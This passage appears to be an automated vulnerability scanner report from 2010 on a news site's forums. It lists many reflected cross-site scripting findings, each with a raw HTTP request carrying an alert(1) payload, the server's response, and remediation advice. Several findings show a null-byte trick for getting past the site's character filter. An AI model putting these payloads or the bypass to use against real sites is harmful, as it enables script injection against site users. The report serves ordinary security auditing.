GET /forums/forum%00ef166"-alert(1)-"5348053c353/602 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:27 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:51 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22068
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0087dba"-alert(1)-"bd7fc6dfef5 was submitted in the REST URL parameter 3. This input was echoed as 87dba"-alert(1)-"bd7fc6dfef5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /forums/forum/602%0087dba"-alert(1)-"bd7fc6dfef5 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:39 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:03 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22068
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cac3"-alert(1)-"ff2a2ccfa6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forums8cac3"-alert(1)-"ff2a2ccfa6/forum/673 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 14 Nov 2010 23:12:58 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=7cf2c41678eb464964f8a0ac1163697f; expires=Wed, 08 Dec 2010 02:46:18 GMT; path=/; domain=.forums.mercurynews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 14 Nov 2010 23:13:22 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22034
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00f1250"-alert(1)-"6cf71db7b96 was submitted in the REST URL parameter 2. This input was echoed as f1250"-alert(1)-"6cf71db7b96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /forums/forum%00f1250"-alert(1)-"6cf71db7b96/673 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 14 Nov 2010 23:13:32 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=ec6a4cd6b8b79036be9cc2544a3b80f1; expires=Wed, 08 Dec 2010 02:46:52 GMT; path=/; domain=.forums.mercurynews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 14 Nov 2010 23:13:56 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21992
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00827f3"-alert(1)-"682449f4fa5 was submitted in the REST URL parameter 3. This input was echoed as 827f3"-alert(1)-"682449f4fa5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /forums/forum/673%00827f3"-alert(1)-"682449f4fa5 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 14 Nov 2010 23:13:58 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=96d5ff16ceb4d4857e2b1a534cbdbe8f; expires=Wed, 08 Dec 2010 02:47:18 GMT; path=/; domain=.forums.mercurynews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 14 Nov 2010 23:14:22 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21992
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55459"-alert(1)-"f8751e5772f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0035e64"-alert(1)-"1c84bda8999 was submitted in the REST URL parameter 2. This input was echoed as 35e64"-alert(1)-"1c84bda8999 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0054fb5"-alert(1)-"d8ab2187b4c was submitted in the REST URL parameter 3. This input was echoed as 54fb5"-alert(1)-"d8ab2187b4c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0031fdf"-alert(1)-"ae07d35c128 was submitted in the REST URL parameter 4. This input was echoed as 31fdf"-alert(1)-"ae07d35c128 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7fea7<script>alert(1)</script>441aed72aaa was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of the js_param1 request parameter is copied into the HTML document as plain text between tags. The payload 4134b<script>alert(1)</script>ea3b7054a28 was submitted in the js_param1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7fc6"-alert(1)-"9628637350 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forumsd7fc6"-alert(1)-"9628637350/poll HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 14 Nov 2010 23:12:05 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=d014b033f451192e0b481c31c0f9c21f; expires=Wed, 08 Dec 2010 02:45:25 GMT; path=/; domain=.forums.mercurynews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 14 Nov 2010 23:12:29 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22022
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00cc000"-alert(1)-"9c127b33533 was submitted in the REST URL parameter 2. This input was echoed as cc000"-alert(1)-"9c127b33533 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /forums/poll%00cc000"-alert(1)-"9c127b33533 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 14 Nov 2010 23:12:30 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=ba286c7c4afb5835084961bfc4371e7b; expires=Wed, 08 Dec 2010 02:45:50 GMT; path=/; domain=.forums.mercurynews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 14 Nov 2010 23:12:54 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21987
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dae6d"-alert(1)-"6579eb870fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0038e10"-alert(1)-"50952c2689f was submitted in the REST URL parameter 2. This input was echoed as 38e10"-alert(1)-"50952c2689f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00db1dc"-alert(1)-"884372cd347 was submitted in the REST URL parameter 3. This input was echoed as db1dc"-alert(1)-"884372cd347 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea44e"-alert(1)-"b9cbcd4d1f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jrssea44e"-alert(1)-"b9cbcd4d1f1/forum/602/5 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:00 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:24 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22114
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 861fb"-alert(1)-"f033e721dd3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jrss/forum861fb"-alert(1)-"f033e721dd3/602/5 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:14 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22114
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abcc9"-alert(1)-"c5da668924b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jrss/forum/602abcc9"-alert(1)-"c5da668924b/5 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:26 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:50 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22117
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ddeb"-alert(1)-"d654b8caae1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll6ddeb"-alert(1)-"d654b8caae1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:05:52 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:16 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22084
1.37. http://forums.mercurynews.com/poll [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/poll
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 617c4"-alert(1)-"5f42983c31b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll?617c4"-alert(1)-"5f42983c31b=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:05:42 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:06 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19326
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 266bd"-alert(1)-"bf4e6a9d30d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll266bd"-alert(1)-"bf4e6a9d30d/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:05:59 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:23 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22216
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f844"-alert(1)-"3df5df2d371 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county2f844"-alert(1)-"3df5df2d371 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:03 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:27 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20220
1.40. http://forums.mercurynews.com/poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1bf3"-alert(1)-"01dc7af58ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county?b1bf3"-alert(1)-"01dc7af58ce=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:05:54 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:18 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28628
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72dff"-alert(1)-"3eb0ed22cc2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e61ea"-alert(1)-"f6fde09b897 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab22e"-alert(1)-"d193185f86e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
